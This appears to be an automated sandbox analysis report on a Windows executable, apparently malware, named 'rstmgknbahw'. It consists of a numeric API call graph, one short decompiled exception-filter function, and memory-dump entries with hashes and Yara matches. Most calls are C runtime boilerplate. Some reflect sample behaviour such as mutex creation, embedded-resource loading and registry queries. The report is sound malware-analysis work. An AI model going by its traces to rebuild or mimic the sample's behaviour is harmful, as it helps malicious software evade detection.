___scrt_is_nonwritable_in_current_image 12693->12682 12694->12686 12696 405d6e 26 API calls 12695->12696 12698 409bed 12696->12698 12697 409bf3 12713 405cdd 12697->12713 12698->12697 12700 409c25 12698->12700 12702 405d6e 26 API calls 12698->12702 12700->12697 12703 405d6e 26 API calls 12700->12703 12706 409c1c 12702->12706 12704 409c31 CloseHandle 12703->12704 12704->12697 12707 409c3d GetLastError 12704->12707 12705 409c6d 12705->12691 12709 405d6e 26 API calls 12706->12709 12707->12697 12708 4047fb __dosmaperr 20 API calls 12708->12705 12709->12700 12722 405cba LeaveCriticalSection 12710->12722 12712 409b34 12712->12693 12714 405d53 12713->12714 12715 405cec 12713->12715 12716 404831 __dosmaperr 20 API calls 12714->12716 12715->12714 12721 405d16 12715->12721 12717 405d58 12716->12717 12718 40481e __dosmaperr 20 API calls 12717->12718 12719 405d43 12718->12719 12719->12705 12719->12708 12720 405d3d SetStdHandle 12720->12719 12721->12719 12721->12720 12722->12712 12723->12478 12724->12458 11960 40420b 11961 404216 11960->11961 11965 404226 11960->11965 11966 40422c 11961->11966 11964 403e03 ___vcrt_freefls@4 20 API calls 11964->11965 11967 404245 11966->11967 11968 40423f 11966->11968 11970 403e03 ___vcrt_freefls@4 20 API calls 11967->11970 11969 403e03 ___vcrt_freefls@4 20 API calls 11968->11969 11969->11967 11971 404251 11970->11971 11972 403e03 ___vcrt_freefls@4 20 API calls 11971->11972 11973 40425c 11972->11973 11974 403e03 ___vcrt_freefls@4 20 API calls 11973->11974 11975 404267 11974->11975 11976 403e03 ___vcrt_freefls@4 20 API calls 11975->11976 11977 404272 11976->11977 11978 403e03 ___vcrt_freefls@4 20 API calls 11977->11978 11979 40427d 11978->11979 11980 403e03 ___vcrt_freefls@4 20 API calls 11979->11980 11981 404288 11980->11981 11982 403e03 ___vcrt_freefls@4 20 API calls 11981->11982 11983 404293 11982->11983 11984 403e03 ___vcrt_freefls@4 20 API calls 11983->11984 11985 40429e 11984->11985 11986 403e03 ___vcrt_freefls@4 20 API calls 11985->11986 11987 4042ac 11986->11987 11992 4040f2 11987->11992 11998 403ffe 11992->11998 11994 404116 11995 404142 11994->11995 12011 40405f 11995->12011 11997 404166 11997->11964 11999 40400a ___scrt_is_nonwritable_in_current_image 11998->11999 12006 405656 EnterCriticalSection 11999->12006 12001 404014 12004 403e03 ___vcrt_freefls@4 20 API calls 12001->12004 12005 40403e 12001->12005 12003 40404b ___scrt_is_nonwritable_in_current_image 12003->11994 12004->12005 12007 404053 12005->12007 12006->12001 12010 40569e LeaveCriticalSection 12007->12010 12009 40405d 12009->12003 12010->12009 12012 40406b ___scrt_is_nonwritable_in_current_image 12011->12012 12019 405656 EnterCriticalSection 12012->12019 12014 404075 12015 4042d5 __dosmaperr 20 API calls 12014->12015 12016 404088 12015->12016 12020 40409e 12016->12020 12018 404096 ___scrt_is_nonwritable_in_current_image 12018->11997 12019->12014 12023 40569e LeaveCriticalSection 12020->12023 12022 4040a8 12022->12018 12023->12022 12207 40188b 12210 401b74 12207->12210 12209 401890 12209->12209 12211 401ba4 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12210->12211 12212 401b97 12210->12212 12213 401b9b 12211->12213 12212->12211 12212->12213 12213->12209 10795 4c70508 10796 4c70514 10795->10796 10797 4c7049f CreateMutexW 10795->10797 10799 4c704b9 10797->10799 12024 406810 12025 406832 12024->12025 12026 4018cc _ValidateLocalCookies 5 API calls 12025->12026 12027 406898 12026->12027 12353 402b10 RtlUnwind 10800 401711 10805 401e1d SetUnhandledExceptionFilter 10800->10805 10802 401716 _com_raise_error 10806 40382f 10802->10806 10804 401721 10805->10802 10807 403855 10806->10807 10808 40383b 10806->10808 10807->10804 10808->10807 10813 404831 10808->10813 10819 4043a4 GetLastError 10813->10819 10816 404639 11051 4045be 10816->11051 10818 403850 10818->10804 10820 4043c3 10819->10820 10821 4043bd 10819->10821 10826 40441a SetLastError 10820->10826 10845 403ece 10820->10845 10838 405878 10821->10838 10825 4043dd 10852 403e03 10825->10852 10827 403845 10826->10827 10827->10816 10831 4043e3 10833 404411 SetLastError 10831->10833 10832 4043f9 10865 404192 10832->10865 10833->10827 10836 403e03 ___vcrt_freefls@4 17 API calls 10837 40440a 10836->10837 10837->10826 10837->10833 10870 4056b5 10838->10870 10840 40589f 10841 4058b7 TlsGetValue 10840->10841 10842 4058ab 10840->10842 10841->10842 10876 4018cc 10842->10876 10844 4058c8 10844->10820 10850 403edb __dosmaperr 10845->10850 10846 403f1b 10849 404831 __dosmaperr 19 API calls 10846->10849 10847 403f06 HeapAlloc 10848 403f19 10847->10848 10847->10850 10848->10825 10858 4058ce 10848->10858 10849->10848 10850->10846 10850->10847 10891 4068fd 10850->10891 10853 403e37 __dosmaperr 10852->10853 10854 403e0e HeapFree 10852->10854 10853->10831 10854->10853 10855 403e23 10854->10855 10856 404831 __dosmaperr 18 API calls 10855->10856 10857 403e29 GetLastError 10856->10857 10857->10853 10859 4056b5 __dosmaperr 5 API calls 10858->10859 10860 4058f5 10859->10860 10861 405910 TlsSetValue 10860->10861 10862 405904 10860->10862 10861->10862 10863 4018cc _ValidateLocalCookies 5 API calls 10862->10863 10864 4043f2 10863->10864 10864->10825 10864->10832 10907 40416a 10865->10907 10871 4056e1 10870->10871 10872 4056e5 __crt_fast_encode_pointer 10870->10872 10871->10872 10875 405705 10871->10875 10883 405751 10871->10883 10872->10840 10874 405711 GetProcAddress 10874->10872 10875->10872 10875->10874 10877 4018d5 10876->10877 10878 4018d7 IsProcessorFeaturePresent 10876->10878 10877->10844 10880 401f6c 10878->10880 10890 401f30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10880->10890 10882 40204f 10882->10844 10884 405772 LoadLibraryExW 10883->10884 10885 405767 10883->10885 10886 40578f GetLastError 10884->10886 10889 4057a7 10884->10889 10885->10871 10887 40579a LoadLibraryExW 10886->10887 10886->10889 10887->10889 10888 4057be FreeLibrary 10888->10885 10889->10885 10889->10888 10890->10882 10896 406941 10891->10896 10893 406913 10894 4018cc _ValidateLocalCookies 5 API calls 10893->10894 10895 40693d 10894->10895 10895->10850 10897 40694d ___scrt_is_nonwritable_in_current_image 10896->10897 10902 405656 EnterCriticalSection 10897->10902 10899 406958 10903 40698a 10899->10903 10901 40697f ___scrt_is_nonwritable_in_current_image 10901->10893 10902->10899 10906 40569e LeaveCriticalSection 10903->10906 10905 406991 10905->10901 10906->10905 10913 4040aa 10907->10913 10909 40418e 10910 40411a 10909->10910 10924 403fae 10910->10924 10912 40413e 10912->10836 10914 4040b6 ___scrt_is_nonwritable_in_current_image 10913->10914 10919 405656 EnterCriticalSection 10914->10919 10916 4040c0 10920 4040e6 10916->10920 10918 4040de ___scrt_is_nonwritable_in_current_image 10918->10909 10919->10916 10923 40569e LeaveCriticalSection 10920->10923 10922 4040f0 10922->10918 10923->10922 10925 403fba ___scrt_is_nonwritable_in_current_image 10924->10925 10932 405656 EnterCriticalSection 10925->10932 10927 403fc4 10933 4042d5 10927->10933 10929 403fdc 10937 403ff2 10929->10937 10931 403fea ___scrt_is_nonwritable_in_current_image 10931->10912 10932->10927 10934 40430b __fassign 10933->10934 10935 4042e4 __fassign 10933->10935 10934->10929 10935->10934 10940 406472 10935->10940 11050 40569e LeaveCriticalSection 10937->11050 10939 403ffc 10939->10931 10941 4064f2 10940->10941 10945 406488 10940->10945 10942 406540 10941->10942 10944 403e03 ___vcrt_freefls@4 20 API calls 10941->10944 11008 4065e5 10942->11008 10946 406514 10944->10946 10945->10941 10947 4064bb 10945->10947 10952 403e03 ___vcrt_freefls@4 20 API calls 10945->10952 10948 403e03 ___vcrt_freefls@4 20 API calls 10946->10948 10949 4064dd 10947->10949 10956 403e03 ___vcrt_freefls@4 20 API calls 10947->10956 10950 406527 10948->10950 10951 403e03 ___vcrt_freefls@4 20 API calls 10949->10951 10955 403e03 ___vcrt_freefls@4 20 API calls 10950->10955 10957 4064e7 10951->10957 10954 4064b0 10952->10954 10953 40654e 10958 4065ae 10953->10958 10967 403e03 20 API calls ___vcrt_freefls@4 10953->10967 10968 405fec 10954->10968 10960 406535 10955->10960 10961 4064d2 10956->10961 10962 403e03 ___vcrt_freefls@4 20 API calls 10957->10962 10963 403e03 ___vcrt_freefls@4 20 API calls 10958->10963 10965 403e03 ___vcrt_freefls@4 20 API calls 10960->10965 10996 4060ea 10961->10996 10962->10941 10964 4065b4 10963->10964 10964->10934 10965->10942 10967->10953 10969 405ffd 10968->10969 10995 4060e6 10968->10995 10970 40600e 10969->10970 10971 403e03 ___vcrt_freefls@4 20 API calls 10969->10971 10972 406020 10970->10972 10973 403e03 ___vcrt_freefls@4 20 API calls 10970->10973 10971->10970 10974 406032 10972->10974 10976 403e03 ___vcrt_freefls@4 20 API calls 10972->10976 10973->10972 10975 406044 10974->10975 10977 403e03 ___vcrt_freefls@4 20 API calls 10974->10977 10978 406056 10975->10978 10979 403e03 ___vcrt_freefls@4 20 API calls 10975->10979 10976->10974 10977->10975 10980 406068 10978->10980 10981 403e03 ___vcrt_freefls@4 20 API calls 10978->10981 10979->10978 10982 40607a 10980->10982 10983 403e03 ___vcrt_freefls@4 20 API calls 10980->10983 10981->10980 10984 403e03 ___vcrt_freefls@4 20 API calls 10982->10984 10985 40608c 10982->10985 10983->10982 10984->10985 10986 403e03 ___vcrt_freefls@4 20 API calls 10985->10986 10988 40609e 10985->10988 10986->10988 10987 4060b0 10990 4060c2 10987->10990 10992 403e03 ___vcrt_freefls@4 20 API calls 10987->10992 10988->10987 10989 403e03 ___vcrt_freefls@4 20 API calls 10988->10989 10989->10987 10991 4060d4 10990->10991 10993 403e03 ___vcrt_freefls@4 20 API calls 10990->10993 10994 403e03 ___vcrt_freefls@4 20 API calls 10991->10994 10991->10995 10992->10990 10993->10991 10994->10995 10995->10947 10997 4060f7 10996->10997 11007 40614f 10996->11007 10998 406107 10997->10998 10999 403e03 ___vcrt_freefls@4 20 API calls 10997->10999 11000 403e03 ___vcrt_freefls@4 20 API calls 10998->11000 11001 406119 10998->11001 10999->10998 11000->11001 11002 40612b 11001->11002 11003 403e03 ___vcrt_freefls@4 20 API calls 11001->11003 11004 40613d 11002->11004 11005 403e03 ___vcrt_freefls@4 20 API calls 11002->11005 11003->11002 11006 403e03 ___vcrt_freefls@4 20 API calls 11004->11006 11004->11007 11005->11004 11006->11007 11007->10949 11009 406610 11008->11009 11010 4065f2 11008->11010 11009->10953 11010->11009 11014 40618f 11010->11014 11013 403e03 ___vcrt_freefls@4 20 API calls 11013->11009 11015 40626d 11014->11015 11016 4061a0 11014->11016 11015->11013 11017 406153 __fassign 20 API calls 11016->11017 11018 4061a8 11017->11018 11019 406153 __fassign 20 API calls 11018->11019 11020 4061b3 11019->11020 11021 406153 __fassign 20 API calls 11020->11021 11022 4061be 11021->11022 11023 406153 __fassign 20 API calls 11022->11023 11024 4061c9 11023->11024 11025 406153 __fassign 20 API calls 11024->11025 11026 4061d7 11025->11026 11027 403e03 ___vcrt_freefls@4 20 API calls 11026->11027 11028 4061e2 11027->11028 11029 403e03 ___vcrt_freefls@4 20 API calls 11028->11029 11030 4061ed 11029->11030 11031 403e03 ___vcrt_freefls@4 20 API calls 11030->11031 11032 4061f8 11031->11032 11033 406153 __fassign 20 API calls 11032->11033 11034 406206 11033->11034 11035 406153 __fassign 20 API calls 11034->11035 11036 406214 11035->11036 11037 406153 __fassign 20 API calls 11036->11037 11038 406225 11037->11038 11039 406153 __fassign 20 API calls 11038->11039 11040 406233 11039->11040 11041 406153 __fassign 20 API calls 11040->11041 11042 406241 11041->11042 11043 403e03 ___vcrt_freefls@4 20 API calls 11042->11043 11044 40624c 11043->11044 11045 403e03 ___vcrt_freefls@4 20 API calls 11044->11045 11046 406257 11045->11046 11047 403e03 ___vcrt_freefls@4 20 API calls 11046->11047 11048 406262 11047->11048 11049 403e03 ___vcrt_freefls@4 20 API calls 11048->11049 11049->11015 11050->10939 11052 4043a4 __dosmaperr 20 API calls 11051->11052 11053 4045d4 11052->11053 11054 4045e2 11053->11054 11055 404633 11053->11055 11059 4018cc _ValidateLocalCookies 5 API calls 11054->11059 11062 404649 IsProcessorFeaturePresent 11055->11062 11057 404638 11058 4045be _com_raise_error 26 API calls 11057->11058 11060 404645 11058->11060 11061 404609 11059->11061 11060->10818 11061->10818 11063 404654 11062->11063 11066 40446f 11063->11066 11067 40448b _abort ___scrt_get_show_window_mode 11066->11067 11068 4044b7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11067->11068 11071 404588 _abort 11068->11071 11069 4018cc _ValidateLocalCookies 5 API calls 11070 4045a6 GetCurrentProcess TerminateProcess 11069->11070 11070->11057 11071->11069 12214 4c70416 12217 4c7043e CreateMutexW 12214->12217 12216 4c704b9 12217->12216 12028 405615 12029 405620 12028->12029 12031 405649 12029->12031 12032 405645 12029->12032 12034 405927 12029->12034 12041 40566d 12031->12041 12035 4056b5 __dosmaperr 5 API calls 12034->12035 12036 40594e 12035->12036 12037 40596c InitializeCriticalSectionAndSpinCount 12036->12037 12040 405957 12036->12040 12037->12040 12038 4018cc _ValidateLocalCookies 5 API calls 12039 405983 12038->12039 12039->12029 12040->12038 12042 405699 12041->12042 12043 40567a 12041->12043 12042->12032 12044 405684 DeleteCriticalSection 12043->12044 12044->12042 12044->12044 12218 a8aa7e 12219 a8aaae RegOpenKeyExW 12218->12219 12221 a8ab3c 12219->12221 12354 405b1a 12355 405b4b 12354->12355 12357 405b25 12354->12357 12356 405b35 FreeLibrary 12356->12357 12357->12355 12357->12356 12725 405f9a 12726 405f9f 12725->12726 12728 405fc2 12726->12728 12729 405bca 12726->12729 12730 405bd7 12729->12730 12734 405bf9 12729->12734 12731 405bf3 12730->12731 12732 405be5 DeleteCriticalSection 12730->12732 12733 403e03 ___vcrt_freefls@4 20 API calls 12731->12733 12732->12731 12732->12732 12733->12734 12734->12726 12735 a8ab75 12736 a8abb6 RegQueryValueExW 12735->12736 12738 a8ac3f 12736->12738 12222 4026a0 12223 4026b2 12222->12223 12225 4026c0 @_EH4_CallFilterFunc@8 12222->12225 12224 4018cc _ValidateLocalCookies 5 API calls 12223->12224 12224->12225 12739 a8a948 12741 a8a96a SetWindowLongW 12739->12741 12742 a8a9b1 12741->12742 12226 404ca2 12231 404cd7 12226->12231 12229 404cbe 12230 403e03 ___vcrt_freefls@4 20 API calls 12230->12229 12232 404cb0 12231->12232 12233 404ce9 12231->12233 12232->12229 12232->12230 12234 404d19 12233->12234 12235 404cee 12233->12235 12234->12232 12237 406786 __onexit 29 API calls 12234->12237 12236 403ece __dosmaperr 20 API calls 12235->12236 12238 404cf7 12236->12238 12239 404d34 12237->12239 12240 403e03 ___vcrt_freefls@4 20 API calls 12238->12240 12241 403e03 ___vcrt_freefls@4 20 API calls 12239->12241 12240->12232 12241->12232 11091 401723 11092 40172f ___scrt_is_nonwritable_in_current_image 11091->11092 11116 401985 11092->11116 11094 401736 11096 40175f 11094->11096 11145 401c88 IsProcessorFeaturePresent 11094->11145 11104 40179e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 11096->11104 11127 403480 11096->11127 11100 40177e ___scrt_is_nonwritable_in_current_image 11101 4017fe 11135 401da3 11101->11135 11103 401804 11139 401489 GetModuleHandleW FindResourceW 11103->11139 11104->11101 11149 4036df 11104->11149 11117 40198e 11116->11117 11160 40208d IsProcessorFeaturePresent 11117->11160 11121 40199f 11122 4019a3 11121->11122 11171 403d3f 11121->11171 11122->11094 11125 4019ba 11125->11094 11128 403497 11127->11128 11129 4018cc _ValidateLocalCookies 5 API calls 11128->11129 11130 401778 11129->11130 11130->11100 11131 403424 11130->11131 11133 403453 11131->11133 11132 4018cc _ValidateLocalCookies 5 API calls 11134 40347c 11132->11134 11133->11132 11134->11104 11245 402460 11135->11245 11138 401dc9 11138->11103 11140 4014ab GetModuleHandleW LoadResource 11139->11140 11141 4014ec ExitProcess 11139->11141 11142 4014e5 FreeResource 11140->11142 11143 4014bd LockResource GetModuleHandleW SizeofResource 11140->11143 11142->11141 11143->11142 11144 4014da 11143->11144 11144->11142 11146 401c9e ___scrt_get_show_window_mode 11145->11146 11147 401d46 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11146->11147 11148 401d90 11147->11148 11148->11094 11150 403707 _com_raise_error _abort 11149->11150 11150->11101 11247 404320 GetLastError 11150->11247 11156 403dd3 11267 403e8b 11156->11267 11161 40199a 11160->11161 11162 4025ba 11161->11162 11163 4025bf ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 11162->11163 11182 4027d9 11163->11182 11166 4025cd 11166->11121 11168 4025d5 11169 4025e0 11168->11169 11196 402815 11168->11196 11169->11121 11237 406819 11171->11237 11174 4025e3 11175 4025ec 11174->11175 11176 4025fd 11174->11176 11177 4027be ___vcrt_uninitialize_ptd 6 API calls 11175->11177 11176->11122 11178 4025f1 11177->11178 11179 402815 ___vcrt_uninitialize_locks DeleteCriticalSection 11178->11179 11180 4025f6 11179->11180 11241 402ab3 11180->11241 11183 4027e2 11182->11183 11185 40280b 11183->11185 11186 4025c9 11183->11186 11200 402a33 11183->11200 11187 402815 ___vcrt_uninitialize_locks DeleteCriticalSection 11185->11187 11186->11166 11188 40278b 11186->11188 11187->11186 11218 402982 11188->11218 11190 402795 11191 4027a0 11190->11191 11223 4029f6 11190->11223 11191->11168 11193 4027ae 11194 4027bb 11193->11194 11228 4027be 11193->11228 11194->11168 11197 40283f 11196->11197 11198 402820 11196->11198 11197->11166 11199 40282a DeleteCriticalSection 11198->11199 11199->11197 11199->11199 11205 402861 11200->11205 11202 402a4d 11203 402a6a InitializeCriticalSectionAndSpinCount 11202->11203 11204 402a56 11202->11204 11203->11204 11204->11183 11207 402891 11205->11207 11210 402895 __crt_fast_encode_pointer 11205->11210 11209 4028b5 11207->11209 11207->11210 11211 402901 11207->11211 11208 4028c1 GetProcAddress 11208->11210 11209->11208 11209->11210 11210->11202 11212 402929 LoadLibraryExW 11211->11212 11213 40291e 11211->11213 11214 402945 GetLastError 11212->11214 11217 40295d 11212->11217 11213->11207 11216 402950 LoadLibraryExW 11214->11216 11214->11217 11215 402974 FreeLibrary 11215->11213 11216->11217 11217->11213 11217->11215 11219 402861 try_get_function 5 API calls 11218->11219 11220 40299c 11219->11220 11221 4029b4 TlsAlloc 11220->11221 11222 4029a5 11220->11222 11222->11190 11224 402861 try_get_function 5 API calls 11223->11224 11225 402a10 11224->11225 11226 402a2a TlsSetValue 11225->11226 11227 402a1f 11225->11227 11226->11227 11227->11193 11229 4027ce 11228->11229 11230 4027c8 11228->11230 11229->11191 11232 4029bc 11230->11232 11233 402861 try_get_function 5 API calls 11232->11233 11234 4029d6 11233->11234 11235 4029ed TlsFree 11234->11235 11236 4029e2 11234->11236 11235->11236 11236->11229 11240 406832 11237->11240 11238 4018cc _ValidateLocalCookies 5 API calls 11239 4019ac 11238->11239 11239->11125 11239->11174 11240->11238 11242 402abc 11241->11242 11244 402ae2 11241->11244 11243 402acc FreeLibrary 11242->11243 11242->11244 11243->11242 11244->11176 11246 401db6 GetStartupInfoW 11245->11246 11246->11138 11248 40433c 11247->11248 11249 404336 11247->11249 11251 403ece __dosmaperr 20 API calls 11248->11251 11253 40438b SetLastError 11248->11253 11250 405878 __dosmaperr 11 API calls 11249->11250 11250->11248 11252 40434e 11251->11252 11254 404356 11252->11254 11255 4058ce __dosmaperr 11 API calls 11252->11255 11253->11156 11256 403e03 ___vcrt_freefls@4 20 API calls 11254->11256 11257 40436b 11255->11257 11258 40435c 11256->11258 11257->11254 11259 404372 11257->11259 11260 404397 SetLastError 11258->11260 11261 404192 __dosmaperr 20 API calls 11259->11261 11263 403e8b _abort 35 API calls 11260->11263 11262 40437d 11261->11262 11264 403e03 ___vcrt_freefls@4 20 API calls 11262->11264 11265 4043a3 11263->11265 11266 404384 11264->11266 11266->11253 11266->11260 11278 406a7f 11267->11278 11271 403ea5 IsProcessorFeaturePresent 11274 403eb0 11271->11274 11272 403ec3 11308 4036c9 11272->11308 11273 403e9b 11273->11271 11273->11272 11276 40446f _abort 8 API calls 11274->11276 11276->11272 11311 4069ed 11278->11311 11281 406ada 11282 406ae6 _abort 11281->11282 11283 4043a4 __dosmaperr 20 API calls 11282->11283 11287 406b13 _abort 11282->11287 11289 406b0d _abort 11282->11289 11283->11289 11284 406b5f 11285 404831 __dosmaperr 20 API calls 11284->11285 11286 406b64 11285->11286 11290 404639 _com_raise_error 26 API calls 11286->11290 11293 406b8b 11287->11293 11325 405656 EnterCriticalSection 11287->11325 11289->11284 11289->11287 11307 406b42 11289->11307 11290->11307 11294 406bea 11293->11294 11296 406be2 11293->11296 11304 406c15 11293->11304 11326 40569e LeaveCriticalSection 11293->11326 11294->11304 11327 406ad1 11294->11327 11299 4036c9 _abort 28 API calls 11296->11299 11299->11294 11302 404320 _com_raise_error 38 API calls 11305 406c78 11302->11305 11303 406ad1 _abort 38 API calls 11303->11304 11330 406c9a 11304->11330 11306 404320 _com_raise_error 38 API calls 11305->11306 11305->11307 11306->11307 11334 40aab9 11307->11334 11338 4034d8 11308->11338 11314 406993 11311->11314 11313 403e90 11313->11273 11313->11281 11315 40699f ___scrt_is_nonwritable_in_current_image 11314->11315 11320 405656 EnterCriticalSection 11315->11320 11317 4069ad 11321 4069e1 11317->11321 11319 4069d4 ___scrt_is_nonwritable_in_current_image 11319->11313 11320->11317 11324 40569e LeaveCriticalSection 11321->11324 11323 4069eb 11323->11319 11324->11323 11325->11293 11326->11296 11328 404320 _com_raise_error 38 API calls 11327->11328 11329 406ad6 11328->11329 11329->11303 11331 406ca0 11330->11331 11332 406c69 11330->11332 11337 40569e LeaveCriticalSection 11331->11337 11332->11302 11332->11305 11332->11307 11335 4018cc _ValidateLocalCookies 5 API calls 11334->11335 11336 40aac4 11335->11336 11336->11336 11337->11332 11339 4034e4 _abort 11338->11339 11340 4034fc 11339->11340 11360 401dd9 GetModuleHandleW 11339->11360 11369 405656 EnterCriticalSection 11340->11369 11346 403504 11357 4035a2 11346->11357 11359 403579 11346->11359 11370 403bcd 11346->11370 11348 4035eb 11350 40aab9 _abort 5 API calls 11348->11350 11349 4035bf 11376 4035f1 11349->11376 11355 4035f0 11350->11355 11351 403424 _abort 5 API calls 11356 403591 11351->11356 11352 403424 _abort 5 API calls 11352->11357 11356->11352 11373 4035e2 11357->11373 11359->11351 11359->11356 11361 401de7 11360->11361 11361->11340 11362 403632 GetModuleHandleExW 11361->11362 11363 40365c GetProcAddress 11362->11363 11368 403671 11362->11368 11363->11368 11364 403685 FreeLibrary 11365 40368e 11364->11365 11366 4018cc _ValidateLocalCookies 5 API calls 11365->11366 11367 403698 11366->11367 11367->11340 11368->11364 11368->11365 11369->11346 11384 403906 11370->11384 11406 40569e LeaveCriticalSection 11373->11406 11375 4035bb 11375->11348 11375->11349 11407 405a93 11376->11407 11379 40361f 11382 403632 _abort 8 API calls 11379->11382 11380 4035ff GetPEB 11380->11379 11381 40360f GetCurrentProcess TerminateProcess 11380->11381 11381->11379 11383 403627 ExitProcess 11382->11383 11387 4038b5 11384->11387 11386 40392a 11386->11359 11388 4038c1 ___scrt_is_nonwritable_in_current_image 11387->11388 11395 405656 EnterCriticalSection 11388->11395 11390 4038cf 11396 403956 11390->11396 11394 4038ed ___scrt_is_nonwritable_in_current_image 11394->11386 11395->11390 11399 403976 11396->11399 11400 40397e 11396->11400 11397 4018cc _ValidateLocalCookies 5 API calls 11398 4038dc 11397->11398 11402 4038fa 11398->11402 11399->11397 11400->11399 11401 403e03 ___vcrt_freefls@4 20 API calls 11400->11401 11401->11399 11405 40569e LeaveCriticalSection 11402->11405 11404 403904 11404->11394 11405->11404 11406->11375 11408 405ab8 11407->11408 11411 405aae 11407->11411 11409 4056b5 __dosmaperr 5 API calls 11408->11409 11409->11411 11410 4018cc _ValidateLocalCookies 5 API calls 11412 4035fb 11410->11412 11411->11410 11412->11379 11412->11380 12045 404429 12053 4057cc 12045->12053 12048 4043a4 __dosmaperr 20 API calls 12049 404445 12048->12049 12050 404452 12049->12050 12060 404455 12049->12060 12052 40443d 12054 4056b5 __dosmaperr 5 API calls 12053->12054 12055 4057f3 12054->12055 12056 40580b TlsAlloc 12055->12056 12057 4057fc 12055->12057 12056->12057 12058 4018cc _ValidateLocalCookies 5 API calls 12057->12058 12059 404433 12058->12059 12059->12048 12059->12052 12061 404465 12060->12061 12062 40445f 12060->12062 12061->12052 12064 405822 12062->12064 12065 4056b5 __dosmaperr 5 API calls 12064->12065 12066 405849 12065->12066 12067 405861 TlsFree 12066->12067 12068 405855 12066->12068 12067->12068 12069 4018cc _ValidateLocalCookies 5 API calls 12068->12069 12070 405872 12069->12070 12070->12061 12071 401e29 12072 401e5e 12071->12072 12073 401e39 12071->12073 12073->12072 12076 403dc2 12073->12076 12075 401e69 12077 403dce _abort 12076->12077 12078 404320 _com_raise_error 38 API calls 12077->12078 12079 403dd3 12078->12079 12080 403e8b _abort 38 API calls 12079->12080 12081 403dfd 12080->12081 12082 403e0e HeapFree 12081->12082 12086 403e37 __dosmaperr 12081->12086 12083 403e23 12082->12083 12082->12086 12084 404831 __dosmaperr 20 API calls 12083->12084 12085 403e29 GetLastError 12084->12085 12085->12086 12086->12075 11413 a8a5c2 11414 a8a638 11413->11414 11415 a8a600 DuplicateHandle 11413->11415 11414->11415 11416 a8a60e 11415->11416 11417 a8bbc6 11418 a8bbfb PostMessageW 11417->11418 11419 a8bc26 11417->11419 11420 a8bc10 11418->11420 11419->11418 12743 4015b0 12746 4015c0 12743->12746 12744 4015e0 12745 4015d9 LocalFree 12745->12744 12746->12744 12746->12745 12087 4c702b4 12089 4c702d2 SetCurrentDirectoryW 12087->12089 12090 4c70314 12089->12090 12091 a8bade 12092 a8bb06 CreateIconFromResourceEx 12091->12092 12094 a8bb52 12092->12094 11425 4c7023e 11426 4c70293 11425->11426 11427 4c7026a DispatchMessageW 11425->11427 11426->11427 11428 4c7027f 11427->11428 12362 40333b 12363 403353 12362->12363 12364 40334d 12362->12364 12365 4032cc 20 API calls 12364->12365 12365->12363 12246 4072bc 12247 4072c9 12246->12247 12248 403ece __dosmaperr 20 API calls 12247->12248 12249 4072e3 12248->12249 12250 403e03 ___vcrt_freefls@4 20 API calls 12249->12250 12251 4072ef 12250->12251 12252 403ece __dosmaperr 20 API calls 12251->12252 12256 407315 12251->12256 12254 407309 12252->12254 12253 405927 11 API calls 12253->12256 12255 403e03 ___vcrt_freefls@4 20 API calls 12254->12255 12255->12256 12256->12253 12257 407321 12256->12257 12258 403cbf 12259 4025e3 ___vcrt_uninitialize 8 API calls 12258->12259 12260 403cc6 12259->12260
                          C-Code - Quality: 100%
                          			E00401E1D() {
                          				_Unknown_base(*)()* _t1;
                          
                          				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                          				return _t1;
                          			}




                          0x00401e22
                          0x00401e28

                          APIs
                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                          • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                          • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a77d9e29744bbc069dd5e14f5c3fa4acc621d96c2401a67ff16f8b8e07be4588
                          • Instruction ID: cc29176f8bde51a2f55704cd40455971ce75e5833bd0d7ceef40367a8df53c65
                          • Opcode Fuzzy Hash: a77d9e29744bbc069dd5e14f5c3fa4acc621d96c2401a67ff16f8b8e07be4588
                          • Instruction Fuzzy Hash: B812DE30A00215CFDB25DF6AC9846BDB7FABB84301F5485BAD015AB295EB74A846DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fdc8395412f00a9714247a6cb8a1696a166433986be21c3e91747b1099ee4d25
                          • Instruction ID: 0c0377bc9807cce791314f438b4b19d94ee92eb02f2d730dc0f814cb606bb8b3
                          • Opcode Fuzzy Hash: fdc8395412f00a9714247a6cb8a1696a166433986be21c3e91747b1099ee4d25
                          • Instruction Fuzzy Hash: D3819E32F011159BD725DB69C884A6EB7F3AFC8311F2A8574E805AB355DE31EC018B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
